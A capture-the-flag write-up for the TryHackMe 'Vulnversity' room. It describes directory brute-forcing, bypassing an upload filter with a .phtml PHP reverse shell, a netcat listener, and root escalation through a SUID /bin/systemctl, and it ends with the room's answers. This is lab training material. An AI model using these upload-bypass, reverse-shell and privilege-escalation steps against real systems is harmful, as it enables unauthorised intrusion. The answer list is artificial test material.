TryHackMe - Vulnversity
Last updated
Last updated
If we go to http://10.10.72.158:3333/ we have a website. However the content is not really useful for us. We can run gobuster, that is how we find the folder internal
After a few tries with burp, the accepted exentions is phtml. You can also fuzz it with burp intruder and make a grep match on "extension not allowed" to see which one will be allowed.
We edit php revershell (on kali we have it preinstalled) cp /usr/share/webshells/php/php-reverse-shell.php .
we rename it in the accepted extension mv php-reverse-shell.php php-reverse-shell.phtml
nc -lvp 4444
We set up our listener
Now as mentioned we just need to go to http://<ip>:3333/internal/uploads/php-reverse-shell.phtml
to execute our shell (if this was not specified we could have run gobuster in the internal folder
We get a shell as www-data
Now let's enumerate our ways to privesc
find / -perm -u=s -type f 2>/dev/null
We have a few files with suid bit on
Let's try the exploitation
It creates a service in an env
It will create a temp file in the syst as a service
This will execute a command with bin/sh (in GTFObins it will execute id) in our case we could try to output our root flag in the output folder. It will then set a link and enable it
Here is our modified script
Once we pasted all our commands above we just need to cat /tmp/output
and this will give us the root flag.
Scan the box, how many ports are open?
Answer 6
What version of the squid proxy is running on the machine?
Answer 3.5.12
How many ports will nmap scan if the flag -p-400 was used?
Answer 400
Using the nmap flag -n what will it not resolve?
Answer DNS
What is the most likely operating system this machine is running?
Answer Ubuntu
What port is the web server running on?
Answer 3333
What is the directory that has an upload form page?
Answer /internal/
Run this attack, what extension is allowed?
Answer phtml
What is the name of the user who manages the webserver?
Answer bill
What is the user flag?
I will let you do this on your own Hint: cat /home/bill/user.txt
On the system, search for all SUID files. What file stands out?
Answer /bin/systemctl
Become root and get the last flag (/root/root.txt)
I will let you do this on your own Hint: cat /root/root.txt
This a page with a file upload fonctionnality. This is perfect for a reverse shell
We have a GTFOBins entry for /bin/systemctl